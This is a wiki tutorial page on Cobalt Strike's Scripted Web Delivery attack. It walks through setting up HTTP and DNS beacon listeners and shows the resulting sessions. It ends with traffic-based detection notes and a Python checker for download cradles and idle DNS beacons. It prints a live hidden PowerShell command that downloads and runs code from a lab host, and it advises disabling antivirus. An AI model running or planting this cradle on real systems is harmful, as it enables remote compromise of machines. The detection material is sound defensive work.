Cobalt-Strike/Attacks/Web-Drive-by/Scripted-Web-Delivery

From aldeid
Scripted Web Delivery

Listener

Start by creating a listener (e.g. Beacon-HTTP or Beacon-DNS).

Attack

Attack preparation

From the menu, go to Attacks > Web Drive-by > Scripted Web delivery (S). The following window pops up:

Screenshots of the dialog for an HTTP-Beacon and for a DNS-Beacon listener: Cobalt-strike-attacks-web-drive-by-scripted-web-delivery.png, Cobalt-strike-attacks-web-drive-by-scripted-web-delivery-dns.png

Clicking on the Launch button will open a second popup window with the payload to copy.

Cobalt-strike-attacks-web-drive-by-scripted-web-delivery-payload.png

Payload example:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.222.130:80/a'))"
Information: This kind of payload is likely to be intercepted by antivirus software (e.g. Windows Defender identified it as TrojanDownloader:PowerShell/Bynocco!AR!MTB). For the sake of demonstration, let's disable the anti-virus.

Beacon-HTTP

Exploitation

Once the payload is executed, a session appears in Cobalt Strike:

Cobalt-strike-session-example.png

Detection

Besides the anti-virus, here is what the network traffic looks like:

Initial payload

Cobalt-strike-wireshark-1-1.png

Cobalt-strike-wireshark-1-2.png

Request for action

Cobalt-strike-wireshark-1-3.png

Beacon-DNS

Exploitation

Once executed, the session will probably show up as an empty row in the session list. Right-click it and select Interact. Enter commands (e.g. mode dns, sleep 5) to force the target to check in and send data back.

Cobalt-strike-attack-web-drive-by-scripted-web-delivery-dns-session.png

Detection

Pay attention to the two highlighted blocks below:

  • the first block is the DNS traffic carrying actions (there is data in the exchange)
  • the second block is the DNS traffic without action (the beacon is waiting for a task and receives 0.0.0.0 in reply)

Cobalt-strike-attack-web-drive-by-scripted-web-delivery-dns-traffic-capture.png
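As an added example (not from the original page and not Cobalt Strike's own code), the two detection points above, the PowerShell download cradle seen in the HTTP case and the idle 0.0.0.0 answers seen in the DNS case, implemented as a small Python checker over constructed process command lines and Zeek-style DNS log lines. The log format, the c2.invalid domain and the addresses are assumptions.

```python
import re
from collections import Counter

# Indicators of the PowerShell download cradle Scripted Web Delivery emits:
# a PowerShell host, an IEX/Invoke-Expression, and a WebClient DownloadString.
CRADLE_PATTERNS = [
    re.compile(r"powershell(\.exe)?", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"net\.webclient|downloadstring", re.I),
]

def is_download_cradle(cmdline: str) -> bool:
    """True when a process command line matches every cradle indicator."""
    return all(p.search(cmdline) for p in CRADLE_PATTERNS)

def parent_domain(name: str) -> str:
    """Reduce a queried hostname to its last two labels (the C2 zone)."""
    return ".".join(name.rstrip(".").split(".")[-2:])

def find_idle_dns_beacons(dns_log: str, min_hits: int = 3) -> dict:
    """Count A queries per (source, parent domain) answered with 0.0.0.0.
    Beacon-DNS polls its domain and gets 0.0.0.0 until a task is queued, so
    repeated answers like that from one host are the idle heartbeat.
    Assumed Zeek-like log format: ts src query qtype answer"""
    hits = Counter()
    for line in dns_log.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        _ts, src, query, qtype, answer = parts
        if qtype == "A" and answer == "0.0.0.0":
            hits[(src, parent_domain(query))] += 1
    return {key: n for key, n in hits.items() if n >= min_hits}

# Constructed sample data (not from the original page; .invalid is reserved).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
    ".downloadstring('http://172.16.222.130:80/a'))\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1",
]
SAMPLE_DNS_LOG = """\
1.0 10.0.0.5 a1b2.c2.invalid A 0.0.0.0
2.0 10.0.0.5 c3d4.c2.invalid A 0.0.0.0
3.0 10.0.0.5 e5f6.c2.invalid A 0.0.0.0
4.0 10.0.0.5 www.example.com A 203.0.113.10
5.0 10.0.0.7 api.example.org A 0.0.0.0
"""

if __name__ == "__main__":
    print([c for c in SAMPLE_CMDLINES if is_download_cradle(c)])
    print(find_idle_dns_beacons(SAMPLE_DNS_LOG))  # {('10.0.0.5', 'c2.invalid'): 3}
```

A single 0.0.0.0 answer is normal noise, which is why the DNS check counts per source and zone before flagging.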